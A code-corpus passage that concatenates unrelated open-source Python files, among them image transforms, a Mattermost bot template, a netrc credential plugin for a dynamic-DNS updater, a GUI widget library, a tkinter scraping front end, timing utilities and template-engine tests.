return self.rng[swarm_id].randint(lower_limit, upper_limit)
def generate_hash(self, swarm_id):
return self.rng[swarm_id].getrandbits(128)
def get_package(self, swarm_id):
if self.delivery_loggers[swarm_id].log_is_full(swarm_id):
return None
rand = self.generate_number(swarm_id, 0, self.pool_size - 1)
weightIndex = self.generate_number(swarm_id, 0, len(self.package_weights)-1)
weight = self.package_weights[weightIndex]
id = self.generate_hash(swarm_id)
package = {'id': str(id), 'coordinates': self.coordinate_pool[rand].tolist(), 'weight': weight, 'drone': None, 'picked': False}
self.delivery_loggers[swarm_id].add_package(swarm_id, package)
return package
def pickup(self, swarm_id, package_id, drone: Drone):
success = self.delivery_loggers[swarm_id].pickup(swarm_id, package_id, drone)
return success
def deliver(self, swarm_id, package_id, drone: Drone):
success = self.delivery_loggers[swarm_id].deliver(swarm_id, package_id, drone)
return success
def print_deliveries(self, swarm_id):
success = self.delivery_loggers[swarm_id].print_deliveries()
return success
| 2.484375
| 2
|
src/data/transforms.py
|
Valentyn1997/oct-diagn-semi-supervised
| 4
|
12775627
|
import numpy as np
from PIL import Image
from src.data.rand_augment import RandAugmentMC
import torchvision.transforms as transforms
def pad(x, border=4):
return np.pad(x, [(0, 0), (border, border), (border, border)], mode='reflect')
class RandomPadandCrop(object):
"""Crop randomly the image.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, width=4, output_size=None):
self.width = width
if output_size is None:
self.output_size = output_size
# assert isinstance(output_size, (int, tuple))
elif isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, x):
old_h, old_w = x.size[:2]
x = np.transpose(x, (2, 0, 1))
x = pad(x, self.width)
h, w = x.shape[1:]
if self.output_size is None:
new_h, new_w = old_h, old_w
else:
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
x = x[:, top: top + new_h, left: left + new_w]
return Image.fromarray(np.transpose(x, (1, 2, 0)))
# TODO Implement TransformKTimes
class TransformTwice:
def __init__(self, transform):
self.transform = transform
def __call__(self, inp):
out1 = self.transform(inp)
out2 = self.transform(inp)
return out1, out2
class TransformFix(object):
def __init__(self, base_transform):
self.weak = base_transform
# Inserting strong augmentation
self.strong = []
for transform in base_transform.transforms:
if isinstance(transform, transforms.ToTensor):
self.strong.append(RandAugmentMC(n=2, m=10))
self.strong.append(transform)
self.strong = transforms.Compose(self.strong)
def __call__(self, inp):
weak = self.weak(inp)
strong = self.strong(inp)
return weak, strong
def build_transforms(normalize=None, center_crop=None, image_size=None,
random_crop=None, flip=None, random_resize_crop=None):
"""
Args:
normalize (tuple or transforms.Normalize): Parameters for data normalization.
center_crop (int): Size for center crop.
image_size (int): Size for image size.
random_crop (int): Size for image random crop.
flip (bool): Randomly flip the data horizontally.
random_resize_crop (dict): Random resize crop the image.
Returns:
Transforms
"""
transform_ = []
if image_size:
if isinstance(image_size, int):
image_size = (image_size, image_size)
transform_.append(transforms.Resize(image_size))
if random_resize_crop:
transform_.append(transforms.RandomResizedCrop(random_resize_crop['size'], random_resize_crop['scale']))
elif random_crop:
transform_.append(transforms.RandomCrop(random_crop))
elif center_crop:
transform_.append(transforms.CenterCrop(center_crop))
if flip:
transform_.append(transforms.RandomHorizontalFlip())
transform_.append(transforms.ToTensor())
if normalize:
if isinstance(normalize, transforms.Normalize):
transform_.append(normalize)
else:
transform_.append(transforms.Normalize(*normalize))
transform = transforms.Compose(transform_)
return transform
| 2.8125
| 3
|
models/base_model.py
|
Zelipha/AirBnB_clone
| 0
|
12775628
|
<filename>models/base_model.py
#!/usr/bin/pyhon3
"""
This is a Parent class that will be inherited
"""
import models
import uuid
from datetime import datetime
"""
class BaseModel that defines all common attributes/methods for other classes
"""
class BaseModel:
def __init__(self, *args, **kwargs):
"""initializing all attributes
"""
self.id = str(uuid.uuid4())
self.created_at = datetime.today()
self.updated_at = datetime.today()
if len(kwargs) != 0:
for key, value in kwargs.items():
if key == 'created_at' or key == 'updated_at':
f = "%Y-%m-%dT%H:%M:%S.%f"
self.__dict__[key] = datetime.strptime(value, f)
else:
self.__dict__[key] = value
else:
models.storage.new(self)
def __str__(self):
"""
Returns:
-class name
-id and
-attribute dictionary
"""
class_name = self.__class__.__name__
return "[{}] ({}) {}".format(class_name, self.id, self.__dict__)
def save(self):
"""
updates the public instance attribute 'updated_at'
with the current datetime
"""
self.updated_at = datetime.today()
models.storage.save()
def to_dict(self):
"""
returns a dictionary containing all keys/values of '__dict__'
of the instance
"""
converted = self.__dict__.copy()
converted["created_at"] = self.created_at.isoformat()
converted["updated_at"] = self.updated_at.isoformat()
converted["__class__"] = self.__class__.__name__
return (converted)
| 3.03125
| 3
|
{{cookiecutter.bot_name}}/bot.py
|
ramnes/cookiecutter-mattermost-bot
| 10
|
12775629
|
<reponame>ramnes/cookiecutter-mattermost-bot
import os
from marshmallow import Schema
from marshmallow.fields import String
from marshmallow.validate import Equal, Length
from sanic import Sanic, response
from sanic.exceptions import abort
# the Mattermost token or tokens generated when you created your slash webhook
MATTERMOST_BOT_TOKEN = os.environ.get('MATTERMOST_BOT_TOKEN')
if not MATTERMOST_BOT_TOKEN:
exit("MATTERMOST_BOT_TOKEN must be set. "
"Please see README.rst for instructions")
app = Sanic(__name__)
class BotSchema(Schema):
text = String(validate=Length(min=3), required=True)
token = String(validate=Equal(MATTERMOST_BOT_TOKEN), required=True)
user_name = String(validate=Length(min=2), required=True)
@app.route('/', methods=['GET'])
async def get(request):
return response.text('Hello there! You might want to POST on this URL.')
@app.route('/', methods=['POST'])
async def post(request):
"""
Mattermost new post event handler
"""
schema = BotSchema().load(request.form)
if schema.errors:
abort(400, schema.errors)
message = "I received \"{}\" from @{}".format(schema.data['text'],
schema.data['user_name'])
return response.json({"text": message})
if __name__ == "__main__":
port = os.environ.get('PORT', 5000)
host = os.environ.get('HOST', '0.0.0.0')
app.run(host=host, port=int(port), auto_reload=True)
| 2.03125
| 2
|
app.py
|
EvanLuo42/Exprimere
| 0
|
12775630
|
<filename>app.py
import json
import uuid
from datetime import timedelta
from flask import Flask, request
from routers.sign import sign
from routers.user import user
from routers.article import article
app = Flask(__name__)
app.register_blueprint(user)
app.register_blueprint(sign)
app.register_blueprint(article)
app.config['SECRET_KEY'] = str(uuid.uuid4())
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=1)
@app.route('/')
def index():
return 'Welcome to Exprimere API!'
if __name__ == '__main__':
app.run()
| 2.140625
| 2
|
src/stk/molecular/functional_groups/functional_groups/aldehyde.py
|
stevenkbennett/stk
| 0
|
12775631
|
<reponame>stevenkbennett/stk
"""
Aldehyde
========
"""
from .generic_functional_group import GenericFunctionalGroup
class Aldehyde(GenericFunctionalGroup):
"""
Represents an aldehyde functional group.
The structure of the functional group is given by the pseudo-SMILES
``[atom][carbon](=[oxygen])[hydrogen]``.
"""
def __init__(
self,
carbon,
oxygen,
hydrogen,
atom,
bonders,
deleters,
placers=None,
):
"""
Initialize a :class:`.Aldehyde` instance.
Parameters
----------
carbon : :class:`.C`
The carbon atom.
oxygen : :class:`.O`
The oxygen atom.
hydrogen : :class:`.H`
The hydrogen atom.
atom : :class:`.Atom`
The atom to which the functional group is attached.
bonders : :class:`tuple` of :class:`.Atom`
The bonder atoms.
deleters : :class:`tuple` of :class:`.Atom`
The deleter atoms.
placers : :class:`tuple` of :class:`.Atom`, optional
The placer atoms. If ``None`` the `bonders` will be used.
"""
self._carbon = carbon
self._oxygen = oxygen
self._hydrogen = hydrogen
self._atom = atom
atoms = (carbon, oxygen, hydrogen, atom)
super().__init__(
atoms=atoms,
bonders=bonders,
deleters=deleters,
placers=bonders if placers is None else placers,
)
def get_carbon(self):
"""
Get the carbon atom.
Returns
-------
:class:`.C`
The carbon atom.
"""
return self._carbon
def get_oxygen(self):
"""
Get the oxygen atom.
Returns
-------
:class:`.O`
The oxygen atom.
"""
return self._oxygen
def get_hydrogen(self):
"""
Get the hydrogen atom.
Returns
-------
:class:`.H`
The hydrogen atom.
"""
return self._hydrogen
def get_atom(self):
"""
Get the atom to which the functional group is attached.
Returns
-------
:class:`.Atom`
The atom to which the functional group is attached.
"""
return self._atom
def with_atoms(self, atom_map):
clone = super().with_atoms(atom_map)
clone._carbon = atom_map.get(
self._carbon.get_id(),
self._carbon,
)
clone._oxygen = atom_map.get(
self._oxygen.get_id(),
self._oxygen,
)
clone._hydrogen = atom_map.get(
self._hydrogen.get_id(),
self._hydrogen,
)
clone._atom = atom_map.get(
self._atom.get_id(),
self._atom,
)
return clone
def clone(self):
clone = super().clone()
clone._carbon = self._carbon
clone._oxygen = self._oxygen
clone._hydrogen = self._hydrogen
clone._atom = self._atom
return clone
def __repr__(self):
return (
f'{self.__class__.__name__}('
f'{self._carbon}, {self._oxygen}, {self._hydrogen}, '
f'{self._atom}, bonders={self._bonders}, '
f'deleters={self._deleters})'
)
| 3.359375
| 3
|
plugins/auth_netrc.py
|
ppetr/ddupdate
| 0
|
12775632
|
"""
Implement credentials lookup using the ~/.netrc(5) file.
"""
import base64
import binascii
from netrc import netrc
import os.path
from ddupdate.ddplugin import AuthPlugin, AuthError
class AuthNetrc(AuthPlugin):
"""Get credentials stored in the .netrc(5) file.
This is the original storage used before 0.7.1. It is less secure
than for example the keyring but is convenient and, since it does
not require anything to be unlocked, a good candidate for servers.
"""
_name = 'netrc'
_oneliner = 'Store credentials in .netrc(5)'
__version__ = '0.7.1'
def get_auth(self, machine):
"""Implement AuthPlugin::get_auth()."""
path = os.environ.get('NETRC', '')
if path:
pass
elif os.path.exists(os.path.expanduser('~/.netrc')):
path = os.path.expanduser('~/.netrc')
elif os.path.exists('/etc/netrc'):
path = '/etc/netrc'
else:
raise AuthError("Cannot locate the netrc file (see manpage).")
auth = netrc(path).authenticators(machine)
if not auth:
raise AuthError("No .netrc data found for " + machine)
if not auth[2]:
raise AuthError("No password found for " + machine)
try:
pw = base64.b64decode(auth[2]).decode('ascii')
except (binascii.Error, UnicodeDecodeError):
pw = auth[2]
return auth[0], pw
def set_password(self, machine, username, password):
"""Implement AuthPlugin::set_password()."""
def is_matching_entry(line):
"""Return True if line contains 'machine' machine'."""
words = line.split(' ')
for i in range(0, len(words) - 1):
if words[i] == 'machine' \
and words[i + 1].lower() == machine.lower():
return True
return False
def new_entry():
"""Return new entry."""
pw = base64.b64encode(password.encode('utf-8')).decode('ascii')
line = 'machine ' + machine.lower()
if username:
line += ' login ' + username
line += ' password ' + pw
return line
path = os.path.expanduser('~/.netrc')
lines = []
if os.path.exists(path):
with open(path, 'r') as f:
lines = f.readlines()
lines = [line for line in lines if not is_matching_entry(line)]
lines.append(new_entry())
lines = [line.strip() + "\n" for line in lines]
with open(path, 'w') as f:
f.writelines(lines)
| 2.9375
| 3
|
ocempgui/widgets/Bin.py
|
illume/eyestabs
| 0
|
12775633
|
<gh_stars>0
# $Id: Bin.py,v 1.29.2.1 2006/08/17 17:06:33 marcusva Exp $
#
# Copyright (c) 2004-2006, <NAME>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""An abstract widget, which can hold exactly one other widget."""
from BaseWidget import BaseWidget
class Bin (BaseWidget):
"""Bin () -> Bin
A container widget class, which can hold one other widget.
The Bin widget class is an abstract class, which can hold exactly
one other widget. It is usable to serve as a container class, which
can hold various types of widgets and allows inheritors to use their
own look.
The widget to hold can be set or removed using the 'child' attribute
and set_child() method. The child will not be automatically modified
by rebinding any of its attributes.
bin.child = widget
bin.set_child (widget)
The 'padding' attribute and set_padding() method are used to place a
certain amount of pixels between the child widget and the outer
edges of the Bin.
bin.padding = 10
bin.set_padding (10)
Binding the Bin to a new event manager using the 'manager' attribute
or set_event_manager() method will cause the event manager of the
child to be set to the same.
Default action (invoked by activate()):
None
Mnemonic action (invoked by activate_mnemonic()):
None
Attributes:
child - The widget hold by the Bin.
padding - Additional padding between the child and outer edges of
the Bin. Default is 2.
"""
def __init__ (self):
BaseWidget.__init__ (self)
self._child = None
self._padding = 2
def set_child (self, child=None):
"""B.set_child (...) -> None
Sets (or resets) the child of the Bin.
Creates a parent-child relationship from the Bin to the child by
associating the Bin with the child and vice versa.
Raises a TypeError, if the passed argument does not inherit
from the BaseWidget class.
Raises an Exception, if the passed argument is already
attached to another parent.
"""
self.lock ()
if child:
if not isinstance (child, BaseWidget):
raise TypeError ("child must inherit from BaseWidget")
if child.parent:
raise Exception ("child already has a parent")
child.parent = self
if (child.depth != self.depth):
child.set_depth (self.depth)
if (self.manager != None) and not child.manager:
child.set_event_manager (self.manager)
# Set the states for the child.
if not self.sensitive:
child.set_sensitive (self.sensitive)
if self._child:
self._child.parent = None
self._child = child
self.dirty = True
self.unlock ()
def set_depth (self, depth):
"""B.set_depth (...) -> None
Sets the depth of the Bin.
Sets the depth of the Bin and its child to the given value.
"""
self.lock ()
BaseWidget.set_depth (self, depth)
if self.child:
self.child.set_depth (depth)
self.unlock ()
def set_indexable (self, indexable):
"""B.set_indexable (...) -> None
Sets the indexable of the Bin.
Adds the Bin to an IIndexable implementation and causes its child
to be added to the same, too.
"""
BaseWidget.set_indexable (self, indexable)
if self.child:
self.child.set_indexable (indexable)
def set_event_manager (self, manager):
"""B.set_event_manager (...) -> None
Sets the event manager of the Bin.
Adds the Bin to an event manager and causes its child to be
added to the same, too.
"""
BaseWidget.set_event_manager (self, manager)
if self.child:
self.child.set_event_manager (manager)
def set_sensitive (self, sensitive=True):
"""B.set_sensitive (...) -> None
Sets the sensitivity of the Bin and its child.
"""
self.lock ()
BaseWidget.set_sensitive (self, sensitive)
if self.child:
self.child.set_sensitive (sensitive)
self.unlock ()
def set_padding (self, padding):
"""B.set_padding (...) -> None
Sets the padding between the child and edges of the Bin.
The padding value is the amount of pixels to place between the
edges of the Bin and the contained child.
Raises a TypeError, if the passed argument is not a positive
integer.
"""
if (type (padding) != int) or (padding < 0):
raise TypeError ("padding must be a positive integer")
self._padding = padding
self.dirty = True
def destroy (self):
"""B.destroy () -> None
Destroys the Bin and removes it from its event system.
"""
if self.child:
w = self.child
w.parent = None
self.child = None
w.destroy ()
del w
BaseWidget.destroy (self)
def update (self, **kwargs):
"""B.update (...) -> None
Updates the Bin and refreshes its image and rect content.
Updates the Bin and causes its parent to update itself on
demand.
"""
children = kwargs.get ("children", {})
resize = kwargs.get ("resize", False)
if self.locked:
return
# We have to check for possible size changes here!
if resize:
self.dirty = True
else:
BaseWidget.update (self, children=children, resize=resize)
child = property (lambda self: self._child,
lambda self, var: self.set_child (var),
doc = "The widget hold by the Bin.")
padding = property (lambda self: self._padding,
lambda self, var: self.set_padding (var),
doc = "Additional padding between child and borders.")
| 1.578125
| 2
|
tktrials.py
|
murphyd2/EPICscrape
| 0
|
12775634
|
<reponame>murphyd2/EPICscrape
"<NAME> 08-06-18"
from tkinter import ttk
from tkinter import *
from tkinter import filedialog
import EPICscrape
class Application(ttk.Frame):
def __init__(self, master=None):
ttk.Frame.__init__(self, master)
self.grid()
self.master.title("EPICscrape")
self.EPIC_data=None
self.epic_street_address=None
self.project_ids=None
self.codify= None
self.v = IntVar()
def checked():
"""opens the designated file and checks if the pm_name
field has changed if it has it writes the current cred"""
try:
file= open('PM_contact.csv','r')
data = file.readlines()
file.close()
if (PM_name.get(),PM_email.get()) not in data:
file = open("PM_contact.csv","w")
file.write(PM_name.get()+'\n')
file.write("Project Manager\n")
file.write(PM_email.get()+'\n')
file.close()
except IOError:
file = open("PM_contact.csv", "w")
file.write(PM_name.get() + '\n')
file.write(PM_email.get() + '\n')
file.close()
def get_vcp():
if var1.get()==1:
checked()
rendered_search= EPICscrape.retrieve_EPIC_html(self.project.get())
(self.EPIC_data, self.epic_street_address)= EPICscrape.return_all_EPIC_fields(rendered_search)
self.project_ids= EPICscrape.format_IDs(self.EPIC_data)
if var2.get()==0:
draw_midframe(MidFrame,self.project_ids)
else:
self.codify= EPICscrape.return_codify(self.EPIC_data,self.epic_street_address)
self.codify=final(self.codify)
results.set(self.codify)
res_print.config(text=self.codify)
save_button.config(state=NORMAL)
def midframe_click():
"""once a project ID is selected, runs this"""
self.codify = EPICscrape.return_codify(self.EPIC_data, self.epic_street_address)
x = self.v.get()
repr(x)
self.codify=final(self.codify,x)
results.set(self.codify) #Fix the first bit, make the text wrap and get it saving coreectly and your dolden
res_print.config(text=self.codify)
save_button.config(state=NORMAL)
def draw_midframe(MidFrame,mylist):
r = 1
c = 0
t = 0
tupled_epic_ids = []
index = 0
for id in mylist:
tup= ()
tup= (id,index)
tupled_epic_ids.append(tup)
index += 1
print(tupled_epic_ids)
for id,idx in tupled_epic_ids:
rad = ttk.Radiobutton(MidFrame, command=midframe_click, text=id, variable=self.v, value=idx)
if t % 4 == 0 and t != 0:
r += 1
c = 0
rad.grid(row=r, column=c, sticky=W + E + N + S)
c += 1
t += 1
# return tupled_epic_ids
def final(object,idx=None):
#i'm gonna say that i did this for clarity but actually
# i just started doing this before i realized it was unnecessary
if var2.get()==0:
if isinstance(object,EPICscrape.Fields):
object.set_id(self.project_ids[idx])
object.set_contact_name(PM_name.get())
object.set_contact_email(PM_email.get())
return object
elif isinstance(object,EPICscrape.NoLibraryMatch):
object.set_id(self.project_ids[idx])
object.set_contact_name(PM_name.get())
object.set_contact_email(PM_email.get())
return object
else:
object.set_id(self.project.get().upper())
object.set_contact_email(PM_email.get())
object.set_contact_name(PM_name.get())
return object
def save():
filename = filedialog.asksaveasfilename(initialdir="./Desktop", title="Select file",
filetypes=(("CSV files", "*.csv"), ("all files", "*.*")))
msg=EPICscrape.WriteTo(self.codify,str(filename)+'.csv')
if msg=="Done":
master.quit()
# done=ttk.Style().configure("f.Label", background="black", foreground="white", relief="raised")
# ttk.Label(master,text=msg,style="f.Label").grid_anchor(CENTER)
LabelStyle=ttk.Style().configure("TLabel",foreground="black",background="light grey",padding=5,border="black")
TopStyle=ttk.Style().configure("r.TFrame",background="light grey")
MidStyle=ttk.Style().configure("b.TFrame",background="blue")
BottomStyle=ttk.Style().configure("g.TFrame",background="white")
checkst=ttk.Style().configure('lg.TCheckbutton',background="light grey",padding=5)
for r in range(6):
self.master.rowconfigure(r, weight=1)
for c in range(4):
self.master.columnconfigure(c, weight=1)
TopFrame = ttk.Frame(master, borderwidth = 2,style="r.TFrame")
TopFrame.grid(row = 0, column = 0, rowspan = 3, columnspan = 4, sticky = W+E+N+S)
ttk.Label(TopFrame,text="Project Manager and their phone").grid(row=0,column=0, sticky=W+E+N+S)
ttk.Label(TopFrame,text="Project Manager email").grid(row=1,column=0, sticky=W+E+N+S)
ttk.Label(TopFrame,text="OER Project #").grid(row=3, column=0, sticky= W+N+E+S)
#Entry Fields
PM_name = Entry(TopFrame, width=100)
PM_name.grid(row=0,column=1,columnspan=5,sticky=W+E)
PM_email = Entry(TopFrame,width=100)
PM_email.grid(row=1, column=1, columnspan=3,sticky=W+E)
self.project= Entry(TopFrame, width=100)
self.project.grid(row=3,column=1, columnspan=2,sticky=W+E+N+S)
# try filling Entrys from stored info
try:
file = open("PM_contact.csv",'r')
user_em = file.readlines()
file.close()
PM_name.insert(0,user_em[0])
PM_email.insert(0,user_em[1])
except IOError:
PM_name.insert(0,"<NAME> at 212-788-7527")
PM_email.insert(0,"<EMAIL>")
# Remember Me box
var1= IntVar()
chk= ttk.Checkbutton(TopFrame,text= "Remember Me",variable=var1, style="lg.TCheckbutton")
chk.grid(row=2,column=1,columnspan=3)
self.Go= ttk.Button(TopFrame,text="Go",command=get_vcp)
self.Go.grid(row=4,column=1,columnspan=3,sticky=W+E+N+S)
var2=IntVar()
GoFast= ttk.Checkbutton(TopFrame,text="Use this number in my recipients list",variable=var2,style="lg.TCheckbutton")
GoFast.grid(row=4,column=0,sticky=W+E+N+S)
#the number of buttons will need to be created (with a for i in range (len_project_id_list))
#use lambda function?
#once clicked, these buttons will place that value in EPICscrape's first codify field
MidFrame = ttk.Frame(master, borderwidth = 5)
MidFrame.grid(row = 3, column = 0, rowspan = 2, columnspan = 4, sticky = W+E+N+S)
#sample [('15TMP0008M',0),('15EHAN008M',1),('15CVCP060M',2),('15TMP$$$8M',3),('15EH-AN008M',4),('15CVfds0M',5)]
ttk.Label(MidFrame,text="Choose the OER Project ID you'd like to use from EPIC").grid(pady=3,row=0,column=0,columnspan=4,sticky=N+S+E+W)
results = StringVar()
BottomFrame= ttk.Frame(master,borderwidth=2, style="g.TFrame")
BottomFrame.grid(row=5,column=0,rowspan=2,columnspan=4,sticky=N+S+E+W)
results_label=ttk.Label(BottomFrame, text="Here are your results:")
results_label.grid(row=0,column=0,sticky=N+E+W+S)
res_print= ttk.Label(BottomFrame,textvariable=results,wraplength=300,justify=LEFT)
res_print.grid(pady=5, row=1, column=0, columnspan=2, sticky=N + E + W + S)
last=7
ttk.Label(master, text= "What would you like to do?").grid(row=last,column=0,columnspan=2,sticky=N+E+W+S)
save_button = ttk.Button(master,text="save", command=save,state=DISABLED)
save_button.grid(row=last,column=2,sticky =N+W+E+S)
ttk.Button(master,text="quit", command=master.quit).grid(row=last,column=3,sticky=N+E+W+S)
#not working, setting everything up before hand
#span starts count from 1 not 0 i.e. normally counts
def main():
root = Tk()
root.geometry("550x550")
app = Application(master=root)
app.mainloop()
main()
"""
entry error
15cvcp0060m
5cvcp0060m
City, State creates a cell in csv formats ((just keep it separate.))
add PM_email header
create entry just for PM_phone
should write just
"""
| 2.78125
| 3
|
lib/tempora/timing.py
|
marcelveldt/script.module.cherrypy
| 2
|
12775635
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import datetime
import functools
import numbers
import time
__metaclass__ = type
class Stopwatch:
"""
A simple stopwatch which starts automatically.
>>> w = Stopwatch()
>>> _1_sec = datetime.timedelta(seconds=1)
>>> w.split() < _1_sec
True
>>> import time
>>> time.sleep(1.0)
>>> w.split() >= _1_sec
True
>>> w.stop() >= _1_sec
True
>>> w.reset()
>>> w.start()
>>> w.split() < _1_sec
True
It should be possible to launch the Stopwatch in a context:
>>> with Stopwatch() as watch:
... assert isinstance(watch.split(), datetime.timedelta)
In that case, the watch is stopped when the context is exited,
so to read the elapsed time::
>>> watch.elapsed
datetime.timedelta(...)
>>> watch.elapsed.seconds
0
"""
def __init__(self):
self.reset()
self.start()
def reset(self):
self.elapsed = datetime.timedelta(0)
if hasattr(self, 'start_time'):
del self.start_time
def start(self):
self.start_time = datetime.datetime.utcnow()
def stop(self):
stop_time = datetime.datetime.utcnow()
self.elapsed += stop_time - self.start_time
del self.start_time
return self.elapsed
def split(self):
local_duration = datetime.datetime.utcnow() - self.start_time
return self.elapsed + local_duration
# context manager support
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
class IntervalGovernor:
"""
Decorate a function to only allow it to be called once per
min_interval. Otherwise, it returns None.
"""
def __init__(self, min_interval):
if isinstance(min_interval, numbers.Number):
min_interval = datetime.timedelta(seconds=min_interval)
self.min_interval = min_interval
self.last_call = None
def decorate(self, func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
allow = (
not self.last_call
or self.last_call.split() > self.min_interval
)
if allow:
self.last_call = Stopwatch()
return func(*args, **kwargs)
return wrapper
__call__ = decorate
class Timer(Stopwatch):
"""
Watch for a target elapsed time.
>>> t = Timer(0.1)
>>> t.expired()
False
>>> __import__('time').sleep(0.15)
>>> t.expired()
True
"""
def __init__(self, target=float('Inf')):
self.target = self._accept(target)
super(Timer, self).__init__()
def _accept(self, target):
"Accept None or ∞ or datetime or numeric for target"
if isinstance(target, datetime.timedelta):
target = target.total_seconds()
if target is None:
# treat None as infinite target
target = float('Inf')
return target
def expired(self):
return self.split().total_seconds() > self.target
class BackoffDelay:
"""
Exponential backoff delay.
Useful for defining delays between retries. Consider for use
with ``jaraco.functools.retry_call`` as the cleanup.
Default behavior has no effect; a delay or jitter must
be supplied for the call to be non-degenerate.
>>> bd = BackoffDelay()
>>> bd()
>>> bd()
The following instance will delay 10ms for the first call,
20ms for the second, etc.
>>> bd = BackoffDelay(delay=0.01, factor=2)
>>> bd()
>>> bd()
Inspect and adjust the state of the delay anytime.
>>> bd.delay
0.04
>>> bd.delay = 0.01
Set limit to prevent the delay from exceeding bounds.
>>> bd = BackoffDelay(delay=0.01, factor=2, limit=0.015)
>>> bd()
>>> bd.delay
0.015
Limit may be a callable taking a number and returning
the limited number.
>>> at_least_one = lambda n: max(n, 1)
>>> bd = BackoffDelay(delay=0.01, factor=2, limit=at_least_one)
>>> bd()
>>> bd.delay
1
Pass a jitter to add or subtract seconds to the delay.
>>> bd = BackoffDelay(jitter=0.01)
>>> bd()
>>> bd.delay
0.01
Jitter may be a callable. To supply a non-deterministic jitter
between -0.5 and 0.5, consider:
>>> import random
>>> jitter=functools.partial(random.uniform, -0.5, 0.5)
>>> bd = BackoffDelay(jitter=jitter)
>>> bd()
>>> 0 <= bd.delay <= 0.5
True
"""
delay = 0
factor = 1
"Multiplier applied to delay"
jitter = 0
"Number or callable returning extra seconds to add to delay"
def __init__(self, delay=0, factor=1, limit=float('inf'), jitter=0):
self.delay = delay
self.factor = factor
if isinstance(limit, numbers.Number):
limit_ = limit
def limit(n):
return max(0, min(limit_, n))
self.limit = limit
if isinstance(jitter, numbers.Number):
jitter_ = jitter
def jitter():
return jitter_
self.jitter = jitter
def __call__(self):
time.sleep(self.delay)
self.delay = self.limit(self.delay * self.factor + self.jitter())
| 3.734375
| 4
|
MiniTemple/test.py
|
Lattay/MiniTemple
| 0
|
12775636
|
<reponame>Lattay/MiniTemple<filename>MiniTemple/test.py
import unittest
from MiniTemple import (
Template,
compile_text,
render_text
)
class TestTemple(unittest.TestCase):
def __init__(self, arg):
unittest.TestCase.__init__(self, arg)
self.maxDiff = None
def test_render_text(self):
# Simple copy
self.assertEqual('Nothing special', render_text('Nothing special', {}))
# Print variable
self.assertEqual('A variable !',
render_text('<%= a_var %>', {'a_var' : 'A variable !'}))
# If statement
tmpl = '''<% if a_bool: %>OK<% else: %>Nope'''
self.assertEqual('OK', render_text(tmpl, {'a_bool' : True}))
self.assertEqual('Nope', render_text(tmpl, {'a_bool' : False}))
# Loop statement
tmpl = '<% for i in range(n): echo(i) %>'
self.assertEqual('0\n1\n2\n3\n', render_text(tmpl, {'n' : 4}))
def test_compile_text(self):
# reproductibility
tmpl = '''
Here is a slightly more complex example.
Indeed it should show <%= some_var %> and also
<% for i in l :
if i % 2:
write(i)
# some loops
#end
#end
%>
The purpose is to test in one shot the mecanisms of <% write(name) %>
because what is important here is that <%= func_name %> reproduce
same results with same entries.
'''
res_exp = '''
Here is a slightly more complex example.
Indeed it should show some variable and also
1357
The purpose is to test in one shot the mecanisms of MiniTemple
because what is important here is that compile_text reproduce
same results with same entries.
'''
t = compile_text(tmpl)
res1 = t.render(
some_var='some variable',
l=[1,2,3,4,5,6,7,8],
name='MiniTemple',
func_name='compile_text'
)
self.assertEqual(res_exp, res1)
res2 = t.render(
some_var='some variable',
l=[1,2,3,4,5,6,7,8],
name='MiniTemple',
func_name='compile_text'
)
self.assertEqual(res1, res2)
def test_error(self):
tmpl = '''
<% if a_bool: %>
OK
<% #end %>
<% else: %>
Nope'''
try:
render_text(tmpl, {'a_bool' : False})
except Exception as e:
self.assertIsInstance(e, SyntaxError)
else:
self.fail("Here should have been an error.")
if __name__ == '__main__':
unittest.main()
| 2.9375
| 3
|
python_tools/pipeline_kickoff/create_title_file_from_samplesheet.py
|
mskcc/ACCESS-Pipeline
| 4
|
12775637
|
<reponame>mskcc/ACCESS-Pipeline
#!/usr/bin/env python
import xlrd
import argparse
import pandas as pd
from python_tools.constants import *
# Suppress pandas copy warning
pd.options.mode.chained_assignment = None
##################################
# Pipeline Kickoff Step #1
#
# This module is used to create a title file with the information needed for a pipeline run
# It is derived from the manually-curated sample samplesheet
#
# Usage example:
#
# create_title_file_from_samplesheet \
# -i ./SampleSheet.csv \
# -o ./title_file.txt
#
# Note: The following requirements will be imposed on the input samplesheet file:
#
# 1. The fields that are found in the sample samplesheet should matched with the examples in test/test_data
# 2. The sample ID's in the samplesheet must be matched somewhere in the fastq file names fom the -d data folder
# 3. The sample ID's in the samplesheet must be matched somewhere in the path to the SampleSheet.csv files
# 4. The SAMPLE_CLASS column of the samplesheet must consist of the values either "Tumor" or "Normal"
# 5. Each "Tumor" sample must have at least one associated "Normal" sample
# 6. Each sample folder in the -d data folder must have these three files:
#
# '_R1_001.fastq.gz'
